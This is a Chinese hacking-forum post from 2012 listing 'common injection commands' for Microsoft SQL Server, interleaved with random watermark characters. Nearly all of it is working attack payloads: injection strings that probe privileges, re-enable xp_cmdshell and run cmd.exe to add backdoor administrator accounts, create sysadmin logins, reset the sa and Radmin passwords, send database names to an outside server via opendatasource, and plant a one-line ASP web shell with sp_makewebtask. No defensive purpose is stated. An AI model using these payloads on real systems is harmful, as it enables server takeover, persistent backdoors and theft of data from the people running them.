找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2013|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的: [9 b; O6 N$ {
and 1=(Select IS_MEMBER('db_owner'))
4 H* j6 m" m8 K( g  s* I0 hAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--" t1 o: e0 l" m8 e

( M0 K% T, y6 X, }3 \//检测是否有读取某数据库的权限
( R  a) ^8 ]5 qand 1= (Select HAS_DBACCESS('master'))1 R, X" Y+ T. n6 X3 a
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
8 g. q( l. D9 Q, T& k* o6 @7 }8 _& w

8 p+ u2 `. T& j* d/ ?1 D3 \数字类型
/ {3 K9 k% v! }' mand char(124)%2Buser%2Bchar(124)=0! v* `" j; p2 a/ Y1 w

, F9 S2 m. y+ p% G/ Q) L( k5 U, ^字符类型
' q7 ?* D9 [% Z' and char(124)%2Buser%2Bchar(124)=0 and ''='
# W) I7 Z- {$ Q% V  E; e* q" N: e% d4 |9 C# T
搜索类型
* k: N4 D! G0 q$ l) N9 r' and char(124)%2Buser%2Bchar(124)=0 and '%'='9 p+ C) S2 Q; N( C) A% Z
( c0 s1 ?5 G* |) p& a( M
爆用户名, j0 k" r  G0 X. p9 q
and user>0
  E4 \) O: Y6 u# u0 C1 n# x+ b' and user>0 and ''='0 x9 Q# r& L9 q4 x
( s9 J5 w% q' t$ B$ R2 w8 ]1 d
检测是否为SA权限! @+ Q6 X- C& d* D
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--8 a  F! I% k3 l+ R
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
. }2 v; b" ^; W, I7 {1 G. X- D1 {7 N  k: C! j/ T4 ^: O
检测是不是MSSQL数据库
+ P6 D* @4 u" d7 ~- N  land exists (select * from sysobjects);--
7 Q0 I" _: x4 q: C" y5 j
) Z8 F7 v9 V4 d1 z" {. V- i7 e  ]- ^检测是否支持多行0 ]* x  o: v6 O9 x
;declare @d int;--/ d0 r9 _( ^/ c# N* O% X
! _- q+ t. s: B; }$ D) r8 p
恢复 xp_cmdshell- _5 |1 Y/ ~' {, f" ?2 p, M
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--5 ^4 u, x: G) H$ E
* {2 J" M& l6 G* ~& p9 ~9 [7 K+ T

6 K( Y6 ~1 z' T2 d+ qselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')  N; @9 b' r) h

: V# ?" E: I7 z! D//-----------------------
5 e- k" |- o8 l* e. L//       执行命令! I; r4 m# l3 k: z
//-----------------------% P1 t. l! n7 H1 j5 N3 D
首先开启沙盘模式:
# p4 ^( H0 l7 x5 kexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
, J7 B' M- Z# d8 w% @  Z3 C  Z* J! X' R: U6 q. R
然后利用jet.oledb执行系统命令
/ X& U* Y$ |8 a5 q2 q8 w; {) D8 Fselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')8 }7 m$ a- n: q" J) M9 o

# O) G9 ]$ M6 s+ G# i1 U* z( z8 i执行命令
, a' Y$ E5 |) Y2 M;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
8 U" ~- `& x4 q0 W! L" m" Q+ }! B$ l5 J# v' v7 T
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'4 _% \7 M9 |3 h$ J0 X. t7 J" @
) @* b) {8 ~% n0 C+ u1 j$ g  }
判断xp_cmdshell扩展存储过程是否存在:% }/ c; S5 ]- h6 D" S
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')/ u& _4 x. J: ^6 s' G
7 Y8 Q: v8 ^7 j4 v' I
写注册表% G7 X3 y$ o# x! W
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) V# F8 {6 U+ z; y* g! Z1 D; G# x% M  T8 x+ L  @
REG_SZ; v* ^" _! j3 B- S- n# H

. p# y  n5 m2 ]读注册表( K8 S8 Y1 I8 ^% t  n& z
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
) W+ j7 g& x) y7 c! h# c* N/ f2 ]" p
读取目录内容
; R% s$ `" o0 X# F* p  lexec master..xp_dirtree 'c:\winnt\system32\',1,1
* H* `" b8 G# }2 N% |' }5 B8 S# \; Z& N: ~5 [5 }) ?% \  ?

4 N2 k' J: V' ~数据库备份
3 A! X6 c/ X8 s& P# Zbackup database pubs to disk = 'c:\123.bak': K! g+ |, s  ^

0 N9 k2 g- R9 c. `//爆出长度
8 N: {0 _# Y1 l3 ~! Y6 [* Z7 ^And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
/ n- u; O/ H" Z( f: |
3 m5 g/ w/ t9 y8 m. a9 {4 F! K% K% r3 s* k- t! |1 x
+ n( t: ^$ r1 E! V7 ]$ L. c& W
更改sa口令方法:用sql综合利用工具连接后,执行命令:
" d- U; f5 M& C) m2 p! O& ?& p5 ~exec sp_password NULL,'新密码','sa'% D6 H; X/ L) r; |/ r0 w

0 S3 X# n$ L0 Z6 V( X2 l添加和删除一个SA权限的用户test:
5 e5 Z0 {! S2 Z# n1 V0 s& lexec master.dbo.sp_addlogin test,9530772
( f, d5 k7 {0 d" o1 V# S/ Kexec master.dbo.sp_addsrvrolemember test,sysadmin8 p/ I% y" o6 l, H0 i0 J2 w- T
) Q* W' J- E/ i" f/ s+ v( C% p+ }
删除扩展存储过过程xp_cmdshell的语句:* v1 {6 u' z0 n5 b* o9 k
exec sp_dropextendedproc 'xp_cmdshell'/ S; ]$ D+ V% o, y' A, ?
: [; ?0 n3 m) G& M/ \/ i1 ?+ B* Z  T, v3 o
添加扩展存储过过程
3 u; D7 Q4 B8 G+ O2 ~* @EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
; }  C$ S6 i8 C+ \! yGRANT exec On xp_proxiedadata TO public7 l# J" ~1 H; E9 l7 d0 S$ q* V
: u% \0 R9 W( h" x1 ^
+ E* [3 D9 N$ p3 N. G
停掉或激活某个服务。
+ }: k' x! G* K3 A7 }; m3 {' K- t# |% h% l( {
exec master..xp_servicecontrol 'stop','schedule'1 `- `1 T2 k0 C7 h3 W
exec master..xp_servicecontrol 'start','schedule'
5 B$ A7 k% D" @
$ O8 k. _+ K4 s' j6 s5 V8 ?" odbo.xp_subdirs
5 {  A3 a; U( o. Q+ D: X: Z
& n8 G1 K" u- j4 c# X" l- ~只列某个目录下的子目录。( ^  G6 w) H/ q
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
, p4 {: C8 p6 q! V
8 k$ Z) I8 }1 h1 a: t( Hdbo.xp_makecab- ]: Z" T/ {* r
( \" o/ V. B9 c! K; T1 _- G2 {$ E: `
将目标多个档案压缩到某个目标档案之内。
+ Y4 O1 s* s. l% t" v* |; ?所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。$ f0 S1 M  [* F8 g5 o
5 b" Z; {6 w$ L( B" E- W+ B  V
dbo.xp_makecab
% N" r9 t9 N2 s6 n'c:\test.cab','mszip',1,
, y: M! a  p- p'C:\Inetpub\wwwroot\SQLInject\login.asp',6 L- Y0 V" e( V: C6 h. e
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
6 d( J- ?1 f9 M4 m0 ?7 Y
% M' z8 r! a9 N+ S4 o* _xp_terminate_process7 }, N6 Q* O& }/ H! D& N1 P. `3 ?* M

5 r/ M2 Q5 C" o" ^2 o; c" [9 V停掉某个执行中的程序,但赋予的参数是 Process ID。
  M$ Q; N& X: q  H利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID) ~& k: l: I& s0 f
" o1 d3 C; ~& r% _- S, w0 @0 `5 d& ^
xp_terminate_process 2484
* Y1 j+ W) n2 \/ {1 T% D
: {7 X' _: S6 Zxp_unpackcab/ N/ u: q" B/ E( B! S
% A( z/ ]1 k% {! u1 A2 m
解开压缩档。# P9 ]' N* |. v+ H, h. K9 k
6 ^* T! q) {0 `# a
xp_unpackcab 'c:\test.cab','c:\temp',1
+ H  S- p! t5 c& ^" F+ n( y# O7 M! c" x

. P! U" _) Z$ r( O) @" e某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234' {5 q" I3 [9 W1 Y8 ^

0 U5 h( }/ \4 Q  A4 t7 qcreate database lcx;
" g/ x: n' p, }) V" `* r# K/ LCreate TABLE ku(name nvarchar(256) null);' @7 t5 m& t8 K8 g/ H9 P' o* p
Create TABLE biao(id int NULL,name nvarchar(256) null);
! E/ |) A! \$ `2 f  v* |4 b: h) ?" x( z( a7 y
//得到数据库名, {4 P( B1 r5 u" d
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases  |2 a$ v5 l' M, ^* G8 i& m6 h* d2 U

: Y  V: t/ h7 ?2 g
7 A  N3 h/ o$ O' t//在Master中创建表,看看权限怎样
; d- y( z: `& x+ @# h* R8 XCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
# O, W2 M. V( I+ u. Z: X* ^% Z2 \* T$ D: O
用 sp_makewebtask直接在web目录里写入一句话马:  g% Q3 L; C# A& {
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
" D! P" x1 D* Z/ A% S: q3 p  y% U, M. K$ A1 E& I" o
//更新表内容& ~' P7 ~* K1 k- }
Update films SET kind = 'Dramatic' Where id = 123' C; F+ r+ G$ x8 J% B; E

/ s0 M" D5 n" T) \8 E8 c6 U% Q* y//删除内容  F3 w7 L4 w' ?
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表